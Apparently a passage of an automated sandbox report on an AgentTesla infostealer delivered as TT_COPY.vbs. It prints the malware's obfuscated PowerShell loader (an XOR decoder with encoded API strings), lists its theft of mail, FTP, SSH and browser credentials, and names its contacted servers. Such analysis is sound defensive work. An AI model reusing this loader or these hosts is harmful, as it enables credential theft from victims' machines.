vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0mJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Exfiltration Over Alternative Protocol          		1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts321
          Scripting          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          Credentials in Registry          		115
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts21
          Command and Scripting Interpreter          		Logon Script (Windows)11
          Process Injection          		321
          Scripting          		Security Account Manager221
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell          		Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer22
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets241
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common241
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
          Process Injection          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po0%Avira URL Cloudsafe
          http://OowQOv.com0%Avira URL Cloudsafe
          ftp://ftp.mcmprint.netnoffice0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
          https://wNUxderhdqerb.org0%Avira URL Cloudsafe
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX160%Avira URL Cloudsafe
          http://go.micros0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ftp.mcmprint.net
          		185.31.121.136
          		truefalse
            		unknown
            b3solutionscws.com
            		192.185.145.188
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16false
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://OowQOv.comCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://127.0.0.1:HTTP/1.1CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16poCasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://wNUxderhdqerb.orgCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  ftp://ftp.mcmprint.netnofficeCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://go.microsCasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  192.185.145.188
                  		b3solutionscws.comUnited States
                  		46606UNIFIEDLAYER-AS-1USfalse
                  185.31.121.136
                  		ftp.mcmprint.netBulgaria
                  		199364RAX-ASBGfalse

                  General Information

                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:758166
                  Start date and time:2022-12-01 15:47:21 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 47s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:TT_COPY.vbs
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                  Run name:Suspected Instruction Hammering
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal96.troj.spyw.evad.winVBS@7/4@2/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 169
                  • Number of non-executed functions: 2
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
                  • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 2556 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • VT rate limit hit for: TT_COPY.vbs

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

